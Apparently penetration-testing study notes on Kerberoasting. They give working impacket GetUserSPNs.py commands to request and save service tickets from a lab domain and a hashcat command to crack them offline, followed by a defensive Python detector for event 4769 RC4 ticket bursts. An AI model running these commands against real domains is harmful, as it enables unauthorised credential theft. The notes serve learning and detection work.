Kerberoasting:
An SPN (Service Principal Name) is set on either a service account or a user account.
Any authenticated domain user can request a TGS (service ticket) for any account that has an SPN; the ticket is encrypted with that account's password hash.
The ticket can then be cracked offline, so weak or unrotated service-account passwords are the real exposure.
Listing accounts with SPNs (enumeration only, no tickets requested):
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend
Requesting all TGS tickets:
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request
Requesting a single TGS ticket:
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev
Saving the TGS to an output file:
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs
Crack the ticket offline with hashcat (mode 13100 is Kerberos 5 TGS-REP with etype 23, RC4-HMAC):
hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt
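On the defensive side, the procedure above leaves a signature in Windows Security event 4769: one account asking for RC4 (etype 0x17, the type mode 13100 cracks) service tickets for several distinct service accounts in a short burst. The following detection sketch is an added example, not part of the original notes; the flattened log format, client IPs, the jdoe/svc_* names and the thresholds are constructed assumptions.

```python
"""Detect Kerberoasting-style activity in Windows Security event 4769 records.
Added example for these notes, not code from the original page. It assumes
4769 events flattened to one key=value line each (constructed format below);
window and threshold are assumptions to tune per environment."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample. etype 0x17 is RC4-HMAC (etype 23), the ticket type
# hashcat mode 13100 cracks; 0x12 is AES256. Client IPs are made up.
SAMPLE_4769 = """\
2024-01-10T09:00:01 id=4769 account=forend@INLANEFREIGHT.LOCAL service=sqldev etype=0x17 ip=172.16.5.25
2024-01-10T09:00:02 id=4769 account=forend@INLANEFREIGHT.LOCAL service=svc_backup etype=0x17 ip=172.16.5.25
2024-01-10T09:00:02 id=4769 account=forend@INLANEFREIGHT.LOCAL service=svc_iis etype=0x17 ip=172.16.5.25
2024-01-10T09:00:03 id=4769 account=forend@INLANEFREIGHT.LOCAL service=svc_sql2 etype=0x17 ip=172.16.5.25
2024-01-10T09:15:00 id=4769 account=jdoe@INLANEFREIGHT.LOCAL service=WS01$ etype=0x12 ip=172.16.5.40
2024-01-10T09:16:00 id=4769 account=jdoe@INLANEFREIGHT.LOCAL service=sqldev etype=0x12 ip=172.16.5.40
2024-01-10T09:20:00 id=4769 account=jdoe@INLANEFREIGHT.LOCAL service=sqldev etype=0x17 ip=172.16.5.40
"""

def parse_4769(text):
    """Parse the flattened records into dicts with a datetime 'ts' field."""
    events = []
    for line in text.splitlines():
        ts, *fields = line.split()
        rec = dict(f.split("=", 1) for f in fields)
        rec["ts"] = datetime.fromisoformat(ts)
        events.append(rec)
    return events

def detect_kerberoasting(events, window=timedelta(minutes=5), min_services=3):
    """Return {account: sorted services} for accounts requesting RC4 service
    tickets for >= min_services distinct non-computer accounts within one
    window. Computer accounts (trailing $) have long random passwords, so
    requests for their SPNs are ordinary noise and are skipped."""
    rc4 = sorted((e for e in events if e["id"] == "4769"
                  and e["etype"].lower() == "0x17"
                  and not e["service"].endswith("$")), key=lambda e: e["ts"])
    by_account = defaultdict(list)
    for e in rc4:
        by_account[e["account"]].append(e)
    flagged = {}
    for account, evs in by_account.items():
        for i, start in enumerate(evs):  # sliding window over this account's requests
            services = {x["service"] for x in evs[i:] if x["ts"] - start["ts"] <= window}
            if len(services) >= min_services:
                flagged[account] = sorted(services)
                break
    return flagged

if __name__ == "__main__":
    for account, services in detect_kerberoasting(parse_4769(SAMPLE_4769)).items():
        print(f"possible Kerberoasting by {account}: {', '.join(services)}")
```

A single RC4 request (jdoe) stays under the threshold, which matters because legacy clients still negotiate RC4 legitimately; enforcing AES-only service accounts removes that ambiguity.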